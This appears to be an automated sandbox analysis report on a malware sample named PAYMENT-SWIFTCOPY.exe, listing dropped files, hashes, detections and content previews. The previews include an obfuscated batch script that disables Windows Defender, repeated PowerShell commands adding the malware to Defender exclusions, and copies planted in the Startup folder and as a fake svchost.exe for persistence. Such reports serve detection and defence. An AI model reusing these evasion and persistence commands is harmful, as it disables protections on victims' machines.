                                                                                            Reputation:unknown
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\test.bat
                                                                                            Process:C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe
                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):8399
                                                                                            Entropy (8bit):4.665734428420432
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                            MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                            SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                            SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                            SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe
                                                                                            Process:C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):400384
                                                                                            Entropy (8bit):6.200441487466359
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:tM3Xn0uE7DZNLjqQbdV0+VHXBB27gkHvJa9Y1C6g6fgtQ2i57rQA:t6Xn0uYDza4hjJjyVk
                                                                                            MD5:788C7A25B15A7263C24C4060F0C0DF6A
                                                                                            SHA1:C28333F296EA281D90610A0866D5CDB8885FC34B
                                                                                            SHA-256:4BA6A3B111DB7D0E22339141A17EB368E1882734FE0A22641C46AB94C725BFAD
                                                                                            SHA-512:EB6B0EA6B483C000940C2A30A9CCEE14D44A9B1C748486A6B6996E723526AA9E31A7F8DF8599C7ED7720F528AB241B70A7F174CCFC054AFC589447045C101E85
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe, Author: Florian Roth
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                            Reputation:unknown
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.wa..............P......^......^.... ........@.. .......................`......B.....@.....................................W.......|[...................@....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...|[.......\..................@..@.reloc.......@......................@..B................@.......H............T......C...(]...(..........................................M...Z...........................................................................................@...............................................................................................................................................................................................!...........L.......!...T...h...i...s... ...p...r...o...g...r...a...m... ...c...a...n...n...o...t... ...b...e... ...r...
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe:Zone.Identifier
                                                                                            Process:C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:true
                                                                                            Reputation:unknown
                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                            C:\Users\user\Documents\20211026\PowerShell_transcript.960781.+4_7rAAf.20211026173452.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unknown
                                                                                            Category:dropped
                                                                                            Size (bytes):5823
                                                                                            Entropy (8bit):5.4090982206256815
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:BZP/kcN0xa3qDo1ZYxagZk/kcN0xa3qDo1Zy4xC+xCQxCjZV/kcN0xa3qDo1ZY5X:In/Tni9tlnJnnJ
                                                                                            MD5:745ED524755189699FDFE65C6F31173E
                                                                                            SHA1:D584E643E19EE3897AFEC185C33EC67B61F52C26
                                                                                            SHA-256:0D436649286574345453B6BC4790BB518B267406D63E4743570F91307CE5F099
                                                                                            SHA-512:22A86B50DC8F9F13496D9BA15B53EE564DBF59113E98CF7B0B7549C289086B38D1B9AD3B5C5B6D7FA5C0CC3C451642A122813B9FECBD3B652EE1AC192F1482BE
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211026173457..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 960781 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe -Force..Process ID: 6712..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211026173457..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20211026173801..Username: computer\user..RunAs User: DES
                                                                                            C:\Users\user\Documents\20211026\PowerShell_transcript.960781.FpwL3drP.20211026173443.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):5823
                                                                                            Entropy (8bit):5.413091258677915
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:BZtd/kcN0xaXqDo1ZQxagZq/kcN0xaXqDo1Zc4xC+xCQxCjZf/kcN0xaXqDo1ZNB:8n/Bn09tTnynnNP
                                                                                            MD5:86803F1C33794DAEA1CE5FFACAFEC91C
                                                                                            SHA1:E13E1DD2836894F4308D01A88D60CA75AA3BE0AB
                                                                                            SHA-256:FE8E9501B11C0AAE610440792AE6757771F6E5DAA68A5878AE4AC6740229ACA4
                                                                                            SHA-512:33F5765324CBFD6A0B3B2ABC219DE612EBD3FA2AE53BA5294EA115863E093B53A2DD3B23B04BFEF852AB2350EAB1CDB26FD5DDCC46FDBFDD5777C1657DCEFD55
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211026173448..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 960781 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe -Force..Process ID: 6396..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211026173448..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20211026173722..Username: computer\user..RunAs User: DES
                                                                                            C:\Users\user\Documents\20211026\PowerShell_transcript.960781.JqcOaI8e.20211026173442.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4101
                                                                                            Entropy (8bit):5.527937803562003
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:BZS/kcN76aqDo1ZSvxZd/kcN76aqDo1ZeqXD0cD0cF0kZ4:b9u94vJ2
                                                                                            MD5:2F2B13BA0C5543311FFF0E09D90CE7D7
                                                                                            SHA1:A7C777070D4FAA81B54B0E9C43F8091B5B1248D4
                                                                                            SHA-256:3F8F488102566FB40A278454B09155AC26DEE342333270D2F71282174D6568A2
                                                                                            SHA-512:9831F5D0E4CE4A03BC5C43B0021A19BD416B4560E9D5E352FBE0437CC3E3C8230AD343A9EC56EBB68EE46076C88CDD8FDF4BCD3F0267BB003B0613D2C5BC463B
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211026173447..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 960781 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\................exe -Force..Process ID: 6244..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211026173447..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\...........
                                                                                            C:\Users\user\Documents\20211026\PowerShell_transcript.960781.Lo4DyiuL.20211026173447.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):6127
                                                                                            Entropy (8bit):5.555990678906898
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:BZ0/kcNQgqDo1ZIZZu/kcNQgqDo1ZnEeqe8ejZAd/kcNQgqDo1ZuPeseseRZG:BHNnHzltqHVTTF
                                                                                            MD5:C0A33EB0A40C43AC30D9FF41139BD054
                                                                                            SHA1:EAD8A75CC7439857FD9D7C5045D6772666A30E96
                                                                                            SHA-256:79247577A859CF7F50F777F7B34C57AA982C1740046A91133A21AED6AE89EC37
                                                                                            SHA-512:3BF7217EBAA3884B3E2CB3087C18F7004D83DFDAFC8B8655675035C3C0D94E13E22B5EC4E7D18BF928BAABCBAB2CE5A933508AE77C386BC215B88447D05EF589
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211026173452..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 960781 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Cursors\...............\svchost.exe -Force..Process ID: 6680..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211026173453..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Cursors\...............\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 202
                                                                                            C:\Users\user\Documents\20211026\PowerShell_transcript.960781.RKnMdZfS.20211026173436.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):5823
                                                                                            Entropy (8bit):5.409033306522737
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:BZY/kcN0xaWqDo1ZrxagZB/kcN0xaWqDo1ZE4xC+xCQxCjZG/kcN0xaWqDo1Zr5j:NnT8nd9tInRnnl
                                                                                            MD5:CCDD957D02EC17C2049EAF21A1583421
                                                                                            SHA1:DEC63A89A4313F204CA056696941C3980A35CE01
                                                                                            SHA-256:FD4E713FF8B04D4149599C3863D0CAF29356CA3FD65C95E5933C8432EC0C5DE4
                                                                                            SHA-512:4828F447197C69E9F6F0B5F3544B73A5BEC672C4B1E8ACB3757DE17ED982A6D89B87C6FE26FF6A04B28327A1E49D27C52586CA15331A18D0BBD51894BAD36525
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211026173438..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 960781 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe -Force..Process ID: 6036..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211026173438..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20211026173806..Username: computer\user..RunAs User: DES
                                                                                            C:\Users\user\Documents\20211026\PowerShell_transcript.960781.fbPNRacz.20211026173438.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):5823
                                                                                            Entropy (8bit):5.410074042088948
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:BZE/kcN0xaEqDo1ZDxagZN/kcN0xaEqDo1ZL4xC+xCQxCjZH/kcN0xaEqDo1ZF5f:xn9InK9t/nBnnB
                                                                                            MD5:420D4C03FA117606DF4D5082144B8711
                                                                                            SHA1:6AB996182DFF6A5A9CF0B4B3E7591A5124EE88D6
                                                                                            SHA-256:D1C64C6E17DE701E8D2CB0A13B84C43E091539FCC191A942EA90A299A42E3B9B
                                                                                            SHA-512:B654924C5DB4FDEEA01065A56972705DFBDCF19F633264A0A7D149C8E04FAC815385E16D1757F8A66A78B4907A65D58B142D5F22F0C6596C24882B6F17DB600B
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211026173441..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 960781 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe -Force..Process ID: 4920..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211026173441..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20211026173929..Username: computer\user..RunAs User: DES
                                                                                            C:\Users\user\Documents\20211026\PowerShell_transcript.960781.kqvnNE9o.20211026173439.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4101
                                                                                            Entropy (8bit):5.52382641237977
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:BZ1/kcN7oqDo1ZxGxZW/kcN7oqDo1ZMqXD0cD0cF07Zs:qMtvJJ
                                                                                            MD5:952E6D10578AA23E0F967CBED19C298D
                                                                                            SHA1:E3583C533CF8B5A9A71E76BA6E046A9C95FF1B17
                                                                                            SHA-256:9E4D926637C2B9C657C3868C668E8C80AB88A6F25751D69228809973E745736A
                                                                                            SHA-512:C9DB89BC9DCED54835428D5132D117DCDCC08C8A5C6F742287C2E7AF7A63391FF508F58767BFDABC26CAAE99B041B348E75516C22C9C7071A64D8B4DFB351D4C
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211026173442..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 960781 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\................exe -Force..Process ID: 4720..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211026173442..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\...........
                                                                                            C:\Users\user\Documents\20211026\PowerShell_transcript.960781.zQEszdYm.20211026173453.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):0
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:BZe/kcNQGqDo1ZfZZr/kcNQGqDo1ZNEeqe8ejZe/kcNQGqDo1ZzPesesesZ/:/HcUH/ltoHKTT9
                                                                                            MD5:BF684C9C1DA03EBE70E4C1191BA9ACF9
                                                                                            SHA1:59AFD763CEBC49C9E84A8F07F47F5C64A81B59BD
                                                                                            SHA-256:4B1C04155AA6C3D227FB3BD659F843D8B893B9A5D46D37DCB9D0435E45D7D625
                                                                                            SHA-512:C448409F4B65A6111F712EE87D156A07C67D91B1489B7B18CE591BB802CE6DD9C281DE8755B7AD17FFF4C18634C60635A9C85891973F916241107858FDDFBE36
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211026173458..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 960781 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Cursors\...............\svchost.exe -Force..Process ID: 6772..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211026173458..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Cursors\...............\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 202
                                                                                            C:\Windows\Cursors\???????????????\svchost.exe
                                                                                            Process:C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):400384
                                                                                            Entropy (8bit):6.200441487466359
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:tM3Xn0uE7DZNLjqQbdV0+VHXBB27gkHvJa9Y1C6g6fgtQ2i57rQA:t6Xn0uYDza4hjJjyVk
                                                                                            MD5:788C7A25B15A7263C24C4060F0C0DF6A
                                                                                            SHA1:C28333F296EA281D90610A0866D5CDB8885FC34B
                                                                                            SHA-256:4BA6A3B111DB7D0E22339141A17EB368E1882734FE0A22641C46AB94C725BFAD
                                                                                            SHA-512:EB6B0EA6B483C000940C2A30A9CCEE14D44A9B1C748486A6B6996E723526AA9E31A7F8DF8599C7ED7720F528AB241B70A7F174CCFC054AFC589447045C101E85
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Windows\Cursors\???????????????\svchost.exe, Author: Florian Roth
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                            Reputation:unknown
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.wa..............P......^......^.... ........@.. .......................`......B.....@.....................................W.......|[...................@....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...|[.......\..................@..@.reloc.......@......................@..B................@.......H............T......C...(]...(..........................................M...Z...........................................................................................@...............................................................................................................................................................................................!...........L.......!...T...h...i...s... ...p...r...o...g...r...a...m... ...c...a...n...n...o...t... ...b...e... ...r...
                                                                                            C:\Windows\Cursors\???????????????\svchost.exe:Zone.Identifier
                                                                                            Process:C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:true
                                                                                            Reputation:unknown
                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):55
                                                                                            Entropy (8bit):4.306461250274409
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                            C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211027_003433_161.etl
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):8192
                                                                                            Entropy (8bit):3.3890195470871567
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:3C92o+RK5+u9x2YlmCrvI2lWSkeP4LlT2D9YFzPUMCE6JR+l59:Ss6g0c2ZFfuC3S
                                                                                            MD5:8D07976CEE3D9BFBA2ADAFA49A56FBC8
                                                                                            SHA1:DFEC2FE7BB41D18B5A5F85437FC1E6A518E1EB58
                                                                                            SHA-256:9E4ED316B9358F367B6B966722EE57E633162E1EF522C19D4A13724539FF8465
                                                                                            SHA-512:336EB6E5077A20199EDE25C330B8A1DD3C9C2670940828C93C5213DFA5AFC8DF1F583F53ABC9D32EF87367EAE7F448118909FAD28ADA0F8980E7F79E634582A8
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: .... ... ....................................... ...!...............................@....e#......................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... .....xHri............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.0.2.7._.0.0.3.4.3.3._.1.6.1...e.t.l.........P.P.....@....e#.....................................................................................................................................................................................................................................................................

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):6.200441487466359
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            File name:PAYMENT-SWIFTCOPY.exe
                                                                                            File size:400384
                                                                                            MD5:788c7a25b15a7263c24c4060f0c0df6a
                                                                                            SHA1:c28333f296ea281d90610a0866d5cdb8885fc34b
                                                                                            SHA256:4ba6a3b111db7d0e22339141a17eb368e1882734fe0a22641c46ab94c725bfad
                                                                                            SHA512:eb6b0ea6b483c000940c2a30a9ccee14d44a9b1c748486a6b6996e723526aa9e31a7f8df8599c7ed7720f528ab241b70a7f174ccfc054afc589447045c101e85
                                                                                            SSDEEP:6144:tM3Xn0uE7DZNLjqQbdV0+VHXBB27gkHvJa9Y1C6g6fgtQ2i57rQA:t6Xn0uYDza4hjJjyVk
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.wa..............P......^......^.... ........@.. .......................`......B.....@................................

                                                                                            File Icon

                                                                                            Icon Hash:0d0d1113050dc0e4

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x42db5e
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
